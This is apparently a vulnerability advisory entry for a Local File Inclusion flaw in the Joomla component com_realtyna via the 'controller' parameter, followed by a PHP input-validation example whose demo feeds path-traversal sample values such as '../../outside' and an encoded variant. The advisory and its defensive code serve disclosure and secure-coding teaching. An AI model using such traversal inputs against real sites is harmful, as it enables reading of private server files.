vendor: com_realtyna
by: MISTERFRIBO
CVSS: 7,5 HIGH
LFI vulnerability
CWE: 22
Product Name: com_realtyna
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010
Joomla Component com_realtyna LFI vulnerability
A Local File Inclusion (LFI) vulnerability exists in the Joomla component com_realtyna. The vulnerable parameter is 'controller', which is passed in the URL. An attacker can exploit the vulnerability by sending a crafted HTTP request whose 'controller' value contains relative path traversal characters (../), which allows the attacker to read sensitive files on the server.
Mitigation:
To mitigate this vulnerability, the application should validate user input and should not allow any relative path traversal characters (../) in it.
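
One way to implement the validation described above, as an added example that is not the component's own code. The function name `resolve_controller`, the one-file-per-controller layout and the sample values are assumptions made for illustration.

```php
<?php
// Added example (hypothetical names); not com_realtyna's own code.
// Assumption: a controller name maps to <name>.php in one directory.

function resolve_controller(string $name, string $baseDir): ?string
{
    // 1. Allowlist the characters. Dots, slashes, backslashes, percent
    //    signs and NUL bytes all fail, so "../" never reaches the path.
    //    \A and \z anchor the whole string; "$" would allow a trailing newline.
    if (!preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $name)) {
        return null;
    }

    // 2. Canonicalise and confirm the file still sits inside the base
    //    directory (defence in depth, e.g. against symlinks).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null; // unknown controller or missing directory
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary controllers directory holding one file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'ctrl_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'property.php', "<?php\n");

// Constructed sample values for the 'controller' parameter.
$samples = ['property', '../../outside', '..%2f..%2foutside', "property\0", 'missing'];
foreach ($samples as $value) {
    $ok = resolve_controller($value, $dir) !== null;
    printf("%-24s => %s\n", json_encode($value, JSON_UNESCAPED_SLASHES), $ok ? 'accepted' : 'rejected');
}

unlink($dir . DIRECTORY_SEPARATOR . 'property.php');
rmdir($dir);
```

Only `property` is accepted. Validating against an allowlist of characters, and not stripping `../` from the value, avoids bypasses through encoded or nested sequences.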